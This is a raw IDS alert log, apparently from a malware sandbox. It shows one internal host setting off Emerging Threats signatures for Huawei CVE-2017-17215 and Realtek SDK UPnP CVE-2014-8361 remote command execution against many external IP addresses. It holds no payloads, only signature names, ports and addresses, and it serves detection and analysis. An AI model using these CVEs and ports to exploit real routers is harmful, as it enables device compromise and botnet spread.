                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942437215192.168.2.23157.126.129.17
                                      07/20/24-23:01:44.161942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614725052869192.168.2.2318.7.171.33
                                      07/20/24-23:01:47.455724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614180852869192.168.2.23185.97.134.51
                                      07/20/24-23:01:46.092258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5542852869192.168.2.2345.99.89.219
                                      07/20/24-23:01:10.517854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5803852869192.168.2.23183.125.8.233
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771437215192.168.2.23197.53.165.17
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455237215192.168.2.2341.52.85.114
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.23209.253.85.199
                                      07/20/24-23:01:45.370481TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304452869192.168.2.2334.173.234.248
                                      07/20/24-23:01:54.489563TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614352052869192.168.2.23158.218.4.185
                                      07/20/24-23:01:14.126869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075037215192.168.2.2341.199.61.192
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930037215192.168.2.2341.119.245.174
                                      07/20/24-23:01:52.447066TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615585852869192.168.2.23145.241.92.58
                                      07/20/24-23:01:02.127340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041037215192.168.2.23157.86.17.89
                                      07/20/24-23:01:04.999060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614692852869192.168.2.2358.116.31.11
                                      07/20/24-23:01:46.663212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614881252869192.168.2.23162.122.16.215
                                      07/20/24-23:01:57.022868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613446652869192.168.2.2368.238.48.34
                                      07/20/24-23:01:47.644828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615582852869192.168.2.2390.205.27.15
                                      07/20/24-23:01:13.596807TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613609252869192.168.2.2332.75.241.221
                                      07/20/24-23:01:57.690792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614813252869192.168.2.23119.129.124.77
                                      07/20/24-23:01:53.384793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4620652869192.168.2.2349.96.236.62
                                      07/20/24-23:01:04.605795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3502452869192.168.2.23155.161.137.123
                                      07/20/24-23:01:01.892361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5735852869192.168.2.23218.167.11.188
                                      07/20/24-23:01:20.596563TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5272852869192.168.2.2320.24.147.17
                                      07/20/24-23:01:54.153862TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25535852869192.168.2.2334.139.90.241
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287637215192.168.2.23197.123.66.12
                                      07/20/24-23:01:41.392528TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5327052869192.168.2.23185.161.24.118
                                      07/20/24-23:02:00.376572TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5153852869192.168.2.2380.92.70.69
                                      07/20/24-23:01:31.327808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5215052869192.168.2.2338.122.84.31
                                      07/20/24-23:01:48.275988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4842652869192.168.2.23107.5.49.194
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219437215192.168.2.2341.140.127.150
                                      07/20/24-23:00:57.221888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760437215192.168.2.23197.178.33.225
                                      07/20/24-23:01:11.630543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364037215192.168.2.2341.206.100.188
                                      07/20/24-23:01:01.157005TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614441452869192.168.2.2312.55.180.198
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739837215192.168.2.23197.105.28.46
                                      07/20/24-23:01:42.650744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5370252869192.168.2.23143.254.203.194
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689037215192.168.2.23197.10.234.194
                                      07/20/24-23:01:25.484881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5990652869192.168.2.2379.157.163.186
                                      07/20/24-23:01:42.535137TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24362052869192.168.2.23104.24.229.93
                                      07/20/24-23:01:42.213822TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24315452869192.168.2.23163.18.131.94
                                      07/20/24-23:01:54.375005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5476652869192.168.2.23157.156.14.69
                                      07/20/24-23:01:42.196522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5715652869192.168.2.239.196.233.159
                                      07/20/24-23:01:20.593640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24400452869192.168.2.2353.137.194.88
                                      07/20/24-23:01:34.044537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219837215192.168.2.23157.229.87.54
                                      07/20/24-23:01:43.190671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4593452869192.168.2.23130.131.47.204
                                      07/20/24-23:01:11.634077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798837215192.168.2.23157.55.166.124
                                      07/20/24-23:01:46.423677TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23535052869192.168.2.2337.189.26.199
                                      07/20/24-23:00:57.221570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317637215192.168.2.23157.215.252.1
                                      07/20/24-23:01:42.535137TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615609452869192.168.2.23171.216.201.201
                                      07/20/24-23:01:42.437265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5665852869192.168.2.23102.22.43.107
                                      07/20/24-23:01:43.498157TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25696652869192.168.2.23199.90.7.168
                                      07/20/24-23:01:45.432263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5354852869192.168.2.23204.16.50.125
                                      07/20/24-23:01:01.326437TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614844852869192.168.2.23191.79.195.70
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661837215192.168.2.23118.76.56.217
                                      07/20/24-23:01:08.560530TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5925652869192.168.2.2342.114.143.158
                                      07/20/24-23:01:42.042815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615164452869192.168.2.23114.234.94.36
                                      07/20/24-23:01:55.262010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4052252869192.168.2.23105.145.121.113
                                      07/20/24-23:01:04.739839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4424052869192.168.2.23153.94.71.254
                                      07/20/24-23:01:08.590938TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3999052869192.168.2.23150.171.160.226
                                      07/20/24-23:01:04.014688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902837215192.168.2.23197.202.235.206
                                      07/20/24-23:01:08.572790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5676052869192.168.2.2324.167.37.167
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3391037215192.168.2.23131.224.25.117
                                      07/20/24-23:01:27.649945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162437215192.168.2.23164.205.240.199
                                      07/20/24-23:01:41.392527TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4873052869192.168.2.23202.140.13.200
                                      07/20/24-23:01:44.302920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23328652869192.168.2.23148.6.1.136
                                      07/20/24-23:01:31.333805TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23673452869192.168.2.23168.91.139.254
                                      07/20/24-23:01:49.946258TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615403652869192.168.2.2345.99.89.219
                                      07/20/24-23:01:03.242934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4647052869192.168.2.2364.86.139.164
                                      07/20/24-23:01:45.072641TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25063252869192.168.2.23149.136.40.221
                                      07/20/24-23:02:11.506914TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613697452869192.168.2.2319.55.206.132
                                      07/20/24-23:01:49.810143TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23798052869192.168.2.2357.114.247.43
                                      07/20/24-23:01:41.380677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614678052869192.168.2.23191.177.238.243
                                      07/20/24-23:01:01.422220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614473652869192.168.2.23190.124.94.237
                                      07/20/24-23:01:52.972472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3733252869192.168.2.23132.77.166.224
                                      07/20/24-23:01:31.591880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5089052869192.168.2.23172.14.168.150
                                      07/20/24-23:00:57.221803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323037215192.168.2.2346.47.224.132
                                      07/20/24-23:01:46.340763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615404252869192.168.2.23165.18.43.140
                                      07/20/24-23:01:53.099889TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613895452869192.168.2.23162.69.127.248
                                      07/20/24-23:01:42.632123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3755452869192.168.2.23168.18.159.220
                                      07/20/24-23:01:42.390246TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5496852869192.168.2.23189.30.194.82
                                      07/20/24-23:01:08.590754TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5635452869192.168.2.23218.185.172.90
                                      07/20/24-23:01:49.490945TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23650252869192.168.2.23110.15.34.17
                                      07/20/24-23:01:03.948226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614212652869192.168.2.23223.193.169.99
                                      07/20/24-23:01:47.572503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4626852869192.168.2.23169.195.139.119
                                      07/20/24-23:01:04.053605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331837215192.168.2.23197.9.246.73
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.2341.65.238.83
                                      07/20/24-23:01:12.806024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4728852869192.168.2.2398.89.247.140
                                      07/20/24-23:01:42.165780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5149852869192.168.2.2339.181.131.100
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519237215192.168.2.23124.82.46.132
                                      07/20/24-23:01:55.409249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865252869192.168.2.2390.72.98.132
                                      07/20/24-23:02:04.767225TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23373452869192.168.2.2372.182.239.64
                                      07/20/24-23:01:01.164622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614364452869192.168.2.23199.61.238.254
                                      07/20/24-23:01:48.070705TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613460852869192.168.2.2366.14.7.167
                                      07/20/24-23:02:26.791106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614931452869192.168.2.23176.235.230.116
                                      07/20/24-23:01:04.426363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613498852869192.168.2.23172.97.184.195
                                      07/20/24-23:01:04.739839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614424052869192.168.2.23153.94.71.254
                                      07/20/24-23:01:08.574948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24330852869192.168.2.2391.33.144.77
                                      07/20/24-23:01:44.274813TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616074852869192.168.2.2343.229.235.45
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831237215192.168.2.23157.46.123.167
                                      07/20/24-23:02:02.570955TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615147852869192.168.2.23131.116.5.106
                                      07/20/24-23:02:08.084135TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613633852869192.168.2.2382.228.21.159
                                      07/20/24-23:02:06.553447TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25922852869192.168.2.23199.27.212.72
                                      07/20/24-23:01:43.071126TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614297652869192.168.2.23213.170.177.158
                                      07/20/24-23:01:24.883171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687037215192.168.2.2341.51.233.253
                                      07/20/24-23:01:45.119426TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25340252869192.168.2.2393.186.61.171
                                      07/20/24-23:02:06.477726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542852869192.168.2.23128.140.142.60
                                      07/20/24-23:02:09.321968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24356652869192.168.2.23206.198.46.124
                                      07/20/24-23:01:49.170008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6061652869192.168.2.2393.106.207.118
                                      07/20/24-23:01:46.525128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4732252869192.168.2.23121.163.119.125
                                      07/20/24-23:01:56.400580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4301252869192.168.2.23201.180.13.92
                                      07/20/24-23:01:40.321964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623237215192.168.2.23197.27.250.238
                                      07/20/24-23:01:42.374542TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613860252869192.168.2.23165.86.188.195
                                      07/20/24-23:01:31.981855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383837215192.168.2.238.134.141.9
                                      07/20/24-23:01:42.322405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5952052869192.168.2.2398.94.65.60
                                      07/20/24-23:01:48.496839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615233052869192.168.2.23129.68.201.164
                                      07/20/24-23:01:53.746309TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614036652869192.168.2.23105.145.121.113
                                      07/20/24-23:01:45.118041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615987452869192.168.2.2393.106.207.118
                                      07/20/24-23:01:42.147980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5600052869192.168.2.23221.157.224.96
                                      07/20/24-23:01:20.110861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756437215192.168.2.2341.198.222.41
                                      07/20/24-23:01:42.945748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5413852869192.168.2.23180.13.32.83
                                      07/20/24-23:01:10.252357TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4592652869192.168.2.2338.189.198.237
                                      07/20/24-23:01:02.333866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356452869192.168.2.2354.235.197.43
                                      07/20/24-23:01:31.329969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24757852869192.168.2.23151.83.163.85
                                      07/20/24-23:01:41.299284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615781852869192.168.2.23113.55.199.122
                                      07/20/24-23:01:53.267115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5496452869192.168.2.2397.241.192.98
                                      07/20/24-23:00:57.221921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982637215192.168.2.2341.65.251.158
                                      07/20/24-23:01:00.634497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136637215192.168.2.23197.37.15.231
                                      07/20/24-23:01:46.359091TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5081452869192.168.2.23206.50.68.232
                                      07/20/24-23:01:46.464448TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4413652869192.168.2.2393.44.110.204
                                      07/20/24-23:01:44.362240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4296852869192.168.2.2348.223.177.47
                                      07/20/24-23:01:44.466755TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616006652869192.168.2.23153.51.4.30
                                      07/20/24-23:01:47.954400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5353452869192.168.2.23131.254.60.151
                                      07/20/24-23:01:42.454682TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5964452869192.168.2.23161.210.183.51
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.23132.85.106.74
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082037215192.168.2.23157.226.98.85
                                      07/20/24-23:01:08.609855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3865852869192.168.2.23112.103.96.49
                                      07/20/24-23:01:04.034952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104237215192.168.2.23197.80.209.101
                                      07/20/24-23:01:41.947663TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614029052869192.168.2.23202.203.199.212
                                      07/20/24-23:01:45.096837TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24976252869192.168.2.2361.169.227.46
                                      07/20/24-23:01:14.117066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538637215192.168.2.23219.249.103.135
                                      07/20/24-23:01:40.294677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381437215192.168.2.23121.47.221.188
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676437215192.168.2.23197.247.217.62
                                      07/20/24-23:01:42.740527TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613691852869192.168.2.2335.56.95.76
                                      07/20/24-23:01:46.444817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5429452869192.168.2.23207.198.69.39
                                      07/20/24-23:01:01.299586TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614714252869192.168.2.23213.46.179.130
                                      07/20/24-23:01:42.943881TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614994052869192.168.2.23177.9.244.61
                                      07/20/24-23:01:02.045640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993637215192.168.2.2341.136.199.110
                                      07/20/24-23:01:08.559170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4637252869192.168.2.23148.117.206.184
                                      07/20/24-23:01:40.321964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611037215192.168.2.23157.164.14.81
                                      07/20/24-23:01:43.165438TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156052869192.168.2.2348.218.79.196
                                      07/20/24-23:01:02.259207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4935252869192.168.2.23193.7.32.204
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795237215192.168.2.23197.22.197.144
                                      07/20/24-23:01:06.990165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628037215192.168.2.2341.3.17.176
                                      07/20/24-23:01:42.042815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3692052869192.168.2.23177.147.32.222
                                      07/20/24-23:01:42.880524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615913652869192.168.2.2385.78.48.17
                                      07/20/24-23:01:49.663162TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23347252869192.168.2.2336.71.23.107
                                      07/20/24-23:01:27.656128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209837215192.168.2.23210.252.39.6
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838437215192.168.2.2341.190.230.210
                                      07/20/24-23:01:49.490945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924252869192.168.2.2346.134.86.41
                                      07/20/24-23:01:32.073087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226437215192.168.2.23197.100.156.74
                                      07/20/24-23:01:52.819848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613828852869192.168.2.23154.194.235.253
                                      07/20/24-23:01:45.098864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4241052869192.168.2.23174.232.185.220
                                      07/20/24-23:01:42.470759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5733252869192.168.2.231.167.45.35
                                      07/20/24-23:01:07.075937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729437215192.168.2.2343.45.9.49
                                      07/20/24-23:01:41.381812TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615304252869192.168.2.23105.155.204.151
                                      07/20/24-23:01:03.090902TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3769652869192.168.2.23150.171.160.226
                                      07/20/24-23:01:45.925226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5455652869192.168.2.2353.50.131.136
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446237215192.168.2.2341.227.37.208
                                      07/20/24-23:01:27.735617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915237215192.168.2.2341.36.252.9
                                      07/20/24-23:01:47.024843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5999052869192.168.2.23170.93.66.190
                                      07/20/24-23:01:44.631925TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23443852869192.168.2.23213.68.164.174
                                      07/20/24-23:01:52.947418TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24436052869192.168.2.23173.232.109.220
                                      07/20/24-23:01:54.914948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3613652869192.168.2.23191.208.197.76
                                      07/20/24-23:01:00.641803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.23197.103.118.184
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543837215192.168.2.2341.201.237.240
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529237215192.168.2.2399.202.196.168
                                      07/20/24-23:01:44.020551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4632452869192.168.2.23150.244.130.144
